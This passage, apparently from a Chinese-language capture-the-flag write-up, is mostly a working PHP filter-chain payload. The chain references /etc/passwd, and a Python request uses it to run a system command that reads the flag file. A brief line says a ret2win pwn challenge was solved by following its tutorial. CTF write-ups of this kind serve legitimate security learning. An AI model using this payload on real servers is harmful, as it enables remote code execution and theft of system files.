TF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UK.852|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.ISO6937.UCS-2LE|convert.iconv.CP864.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.OSF00010104|convert.iconv.CP860.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UTF-32BE.MS936|convert.iconv.8859_5.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-90.UTF16LE|convert.iconv.IBM874.UNICODEBIG|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-103.ISO-IR-209|convert.iconv.8859_5.CSISO2022JP2|convert.iconv.ISO-2022-JP-3.IBM-943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOWS31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"} x = requests.post(url, data = tmp, params={"1":"system(\"cat /flag_cr14x5hc\");"}) print(x.text) ``` 然後就結束了 ## Pwn ### [教學題] ret2win 我就跟著他的教學做，就不寫了